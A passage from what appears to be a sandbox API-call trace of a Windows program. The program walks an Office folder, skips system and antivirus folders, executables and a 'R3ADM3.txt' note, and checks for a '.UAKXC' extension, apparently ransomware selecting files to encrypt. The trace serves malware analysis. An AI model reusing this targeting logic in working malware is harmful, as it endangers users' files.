ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0158.746] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0158.746] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0158.746] StrStrIW (lpFirst="3082", lpSrch="tmp") returned 0x0 [0158.746] StrStrIW (lpFirst="3082", lpSrch="winnt") returned 0x0 [0158.746] StrStrIW (lpFirst="3082", lpSrch="temp") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="thumb") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="$Recycle.Bin") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="System Volume Information") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="Boot") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="Windows") returned 0x0 [0158.747] StrStrIW (lpFirst="3082", lpSrch="Trend Micro") returned 0x0 [0158.747] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0158.747] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.747] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0158.747] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e07f0 [0158.747] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0158.747] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.747] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x50ff7a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x1313b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCDDS.DLL", cAlternateFileName="")) returned 1 [0158.747] lstrcmpW (lpString1="ACCDDS.DLL", lpString2=".") returned 1 [0158.747] lstrcmpW (lpString1="ACCDDS.DLL", lpString2="..") returned 1 [0158.747] StrStrIW (lpFirst="ACCDDS.DLL", lpSrch=".UAKXC") returned 0x0 [0158.747] StrStrIW (lpFirst="ACCDDS.DLL", lpSrch=".exe") returned 0x0 [0158.747] StrStrIW (lpFirst="ACCDDS.DLL", lpSrch=".dll") returned=".DLL" [0158.747] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x5e8e0f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x8d7a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCDDSF.DLL", cAlternateFileName="")) returned 1 [0158.747] lstrcmpW (lpString1="ACCDDSF.DLL", lpString2=".") returned 1 [0158.747] lstrcmpW (lpString1="ACCDDSF.DLL", lpString2="..") returned 1 [0158.747] StrStrIW (lpFirst="ACCDDSF.DLL", lpSrch=".UAKXC") returned 0x0 [0158.747] StrStrIW (lpFirst="ACCDDSF.DLL", lpSrch=".exe") returned 0x0 [0158.747] StrStrIW (lpFirst="ACCDDSF.DLL", lpSrch=".dll") returned=".DLL" [0158.748] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x5e8e0f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x86db0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCDDSLM.DLL", cAlternateFileName="")) returned 1 [0158.748] lstrcmpW (lpString1="ACCDDSLM.DLL", lpString2=".") returned 1 [0158.748] lstrcmpW (lpString1="ACCDDSLM.DLL", lpString2="..") returned 1 [0158.748] StrStrIW (lpFirst="ACCDDSLM.DLL", lpSrch=".UAKXC") returned 0x0 [0158.748] StrStrIW (lpFirst="ACCDDSLM.DLL", lpSrch=".exe") returned 0x0 [0158.748] StrStrIW (lpFirst="ACCDDSLM.DLL", lpSrch=".dll") returned=".DLL" [0158.748] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603a86d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessWeb", cAlternateFileName="ACCESS~1")) returned 1 [0158.748] lstrcmpW (lpString1="AccessWeb", lpString2=".") returned 1 [0158.748] lstrcmpW (lpString1="AccessWeb", lpString2="..") returned 1 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="tmp") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="winnt") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="temp") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="thumb") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="$Recycle.Bin") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="System Volume Information") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="Boot") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="Windows") returned 0x0 [0158.748] StrStrIW (lpFirst="AccessWeb", lpSrch="Trend Micro") returned 0x0 [0158.748] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0818 [0158.748] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.748] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.748] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.748] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.748] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.749] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0818 | out: hHeap=0xea0000) returned 1 [0158.749] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0818 [0158.749] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32980 [0158.749] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.749] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf73e1e00, ftCreationTime.dwHighDateTime=0x1cacb3c, ftLastAccessTime.dwLowDateTime=0x51090010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf73e1e00, ftLastWriteTime.dwHighDateTime=0x1cacb3c, nFileSizeHigh=0x0, nFileSizeLow=0x161d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCICONS.EXE", cAlternateFileName="")) returned 1 [0158.749] lstrcmpW (lpString1="ACCICONS.EXE", lpString2=".") returned 1 [0158.749] lstrcmpW (lpString1="ACCICONS.EXE", lpString2="..") returned 1 [0158.749] StrStrIW (lpFirst="ACCICONS.EXE", lpSrch=".UAKXC") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCICONS.EXE", lpSrch=".exe") returned=".EXE" [0158.749] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x510dc2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x452988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCVDT.DLL", cAlternateFileName="")) returned 1 [0158.749] lstrcmpW (lpString1="ACCVDT.DLL", lpString2=".") returned 1 [0158.749] lstrcmpW (lpString1="ACCVDT.DLL", lpString2="..") returned 1 [0158.749] StrStrIW (lpFirst="ACCVDT.DLL", lpSrch=".UAKXC") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCVDT.DLL", lpSrch=".exe") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCVDT.DLL", lpSrch=".dll") returned=".DLL" [0158.749] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51174850, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ead0130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5ead0130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCWIZ", cAlternateFileName="")) returned 1 [0158.749] lstrcmpW (lpString1="ACCWIZ", lpString2=".") returned 1 [0158.749] lstrcmpW (lpString1="ACCWIZ", lpString2="..") returned 1 [0158.749] StrStrIW (lpFirst="ACCWIZ", lpSrch="tmp") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCWIZ", lpSrch="winnt") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCWIZ", lpSrch="temp") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCWIZ", lpSrch="thumb") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCWIZ", lpSrch="$Recycle.Bin") returned 0x0 [0158.749] StrStrIW (lpFirst="ACCWIZ", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.750] StrStrIW (lpFirst="ACCWIZ", lpSrch="System Volume Information") returned 0x0 [0158.750] StrStrIW (lpFirst="ACCWIZ", lpSrch="Boot") returned 0x0 [0158.750] StrStrIW (lpFirst="ACCWIZ", lpSrch="Windows") returned 0x0 [0158.750] StrStrIW (lpFirst="ACCWIZ", lpSrch="Trend Micro") returned 0x0 [0158.750] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.750] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.750] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.750] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.750] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.750] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0840 [0158.750] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.750] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.750] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd30b00, ftCreationTime.dwHighDateTime=0x1cab7ea, ftLastAccessTime.dwLowDateTime=0x5e953370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xadd30b00, ftLastWriteTime.dwHighDateTime=0x1cab7ea, nFileSizeHigh=0x0, nFileSizeLow=0x33580, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCWIZ.DLL", cAlternateFileName="")) returned 1 [0158.750] lstrcmpW (lpString1="ACCWIZ.DLL", lpString2=".") returned 1 [0158.750] lstrcmpW (lpString1="ACCWIZ.DLL", lpString2="..") returned 1 [0158.750] StrStrIW (lpFirst="ACCWIZ.DLL", lpSrch=".UAKXC") returned 0x0 [0158.750] StrStrIW (lpFirst="ACCWIZ.DLL", lpSrch=".exe") returned 0x0 [0158.750] StrStrIW (lpFirst="ACCWIZ.DLL", lpSrch=".dll") returned=".DLL" [0158.750] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c38c00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82c38c00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xb5db8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0158.750] lstrcmpW (lpString1="ACEDAO.DLL", lpString2=".") returned 1 [0158.750] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="..") returned 1 [0158.750] StrStrIW (lpFirst="ACEDAO.DLL", lpSrch=".UAKXC") returned 0x0 [0158.750] StrStrIW (lpFirst="ACEDAO.DLL", lpSrch=".exe") returned 0x0 [0158.750] StrStrIW (lpFirst="ACEDAO.DLL", lpSrch=".dll") returned=".DLL" [0158.750] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfff68b70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x695e6e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x695e6e70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ADDINS", cAlternateFileName="")) returned 1 [0158.750] lstrcmpW (lpString1="ADDINS", lpString2=".") returned 1 [0158.751] lstrcmpW (lpString1="ADDINS", lpString2="..") returned 1 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="tmp") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="winnt") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="temp") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="thumb") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="$Recycle.Bin") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="System Volume Information") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="Boot") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="Windows") returned 0x0 [0158.751] StrStrIW (lpFirst="ADDINS", lpSrch="Trend Micro") returned 0x0 [0158.751] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.751] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.751] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.751] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.751] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.751] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0868 [0158.751] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32a70 [0158.751] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.751] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84eaab00, ftCreationTime.dwHighDateTime=0x1c9c978, ftLastAccessTime.dwLowDateTime=0x512a5350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x84eaab00, ftLastWriteTime.dwHighDateTime=0x1c9c978, nFileSizeHigh=0x0, nFileSizeLow=0x1934ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ADVCMP.DIC", cAlternateFileName="")) returned 1 [0158.751] lstrcmpW (lpString1="ADVCMP.DIC", lpString2=".") returned 1 [0158.751] lstrcmpW (lpString1="ADVCMP.DIC", lpString2="..") returned 1 [0158.751] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch=".UAKXC") returned 0x0 [0158.751] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch=".exe") returned 0x0 [0158.751] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch=".dll") returned 0x0 [0158.751] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch=".lnk") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch=".sys") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch=".msi") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVCMP.DIC", lpSrch="R3ADM3.txt") returned 0x0 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0890 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0890 | out: hHeap=0xea0000) returned 1 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ae8 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0890 [0158.752] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32b60 [0158.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ae8 | out: hHeap=0xea0000) returned 1 [0158.752] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.752] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd33c7e00, ftCreationTime.dwHighDateTime=0x1c18605, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd33c7e00, ftLastWriteTime.dwHighDateTime=0x1c18605, nFileSizeHigh=0x0, nFileSizeLow=0x3a1fd6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ADVTEL.DIC", cAlternateFileName="")) returned 1 [0158.752] lstrcmpW (lpString1="ADVTEL.DIC", lpString2=".") returned 1 [0158.752] lstrcmpW (lpString1="ADVTEL.DIC", lpString2="..") returned 1 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch=".UAKXC") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch=".exe") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch=".dll") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch=".lnk") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch=".sys") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch=".msi") returned 0x0 [0158.752] StrStrIW (lpFirst="ADVTEL.DIC", lpSrch="R3ADM3.txt") returned 0x0 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e08b8 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e08b8 | out: hHeap=0xea0000) returned 1 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ae8 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e08b8 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32bd8 [0158.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ae8 | out: hHeap=0xea0000) returned 1 [0158.753] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.753] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x895c9700, ftCreationTime.dwHighDateTime=0x1c9c96b, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x895c9700, ftLastWriteTime.dwHighDateTime=0x1c9c96b, nFileSizeHigh=0x0, nFileSizeLow=0x2e25e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ADVZIP.DIC", cAlternateFileName="")) returned 1 [0158.753] lstrcmpW (lpString1="ADVZIP.DIC", lpString2=".") returned 1 [0158.753] lstrcmpW (lpString1="ADVZIP.DIC", lpString2="..") returned 1 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch=".UAKXC") returned 0x0 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch=".exe") returned 0x0 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch=".dll") returned 0x0 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch=".lnk") returned 0x0 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch=".sys") returned 0x0 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch=".msi") returned 0x0 [0158.753] StrStrIW (lpFirst="ADVZIP.DIC", lpSrch="R3ADM3.txt") returned 0x0 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e08e0 [0158.753] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e08e0 | out: hHeap=0xea0000) returned 1 [0158.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ae8 [0158.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e08e0 [0158.754] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32c50 [0158.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ae8 | out: hHeap=0xea0000) returned 1 [0158.754] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.754] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xcf779b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x17fb78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AEC.DLL", cAlternateFileName="")) returned 1 [0158.754] lstrcmpW (lpString1="AEC.DLL", lpString2=".") returned 1 [0158.754] lstrcmpW (lpString1="AEC.DLL", lpString2="..") returned 1 [0158.754] StrStrIW (lpFirst="AEC.DLL", lpSrch=".UAKXC") returned 0x0 [0158.754] StrStrIW (lpFirst="AEC.DLL", lpSrch=".exe") returned 0x0 [0158.754] StrStrIW (lpFirst="AEC.DLL", lpSrch=".dll") returned=".DLL" [0158.754] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ac1100, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd2441900, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x23ac1100, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xc2788, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AECUTILS.DLL", cAlternateFileName="")) returned 1 [0158.754] lstrcmpW (lpString1="AECUTILS.DLL", lpString2=".") returned 1 [0158.754] lstrcmpW (lpString1="AECUTILS.DLL", lpString2="..") returned 1 [0158.754] StrStrIW (lpFirst="AECUTILS.DLL", lpSrch=".UAKXC") returned 0x0 [0158.754] StrStrIW (lpFirst="AECUTILS.DLL", lpSrch=".exe") returned 0x0 [0158.754] StrStrIW (lpFirst="AECUTILS.DLL", lpSrch=".dll") returned=".DLL" [0158.754] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31e1b00, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x5171bc90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb31e1b00, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0x46080, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ASCIIENG.LNG", cAlternateFileName="")) returned 1 [0158.754] lstrcmpW (lpString1="ASCIIENG.LNG", lpString2=".") returned 1 [0158.755] lstrcmpW (lpString1="ASCIIENG.LNG", lpString2="..") returned 1 [0158.755] StrStrIW (lpFirst="ASCIIENG.LNG", lpSrch=".UAKXC") returned 0x0 [0158.755] StrStrIW (lpFirst="ASCIIENG.LNG", lpSrch=".exe") returned 0x0 [0158.755] StrStrIW (lpFirst="ASCIIENG.LNG", lpSrch=".dll") returned 0x0 [0158.755] StrStrIW (lpFirst="ASCIIENG.LNG", lpSrch=".lnk") returned 0x0 [0158.755] StrStrIW 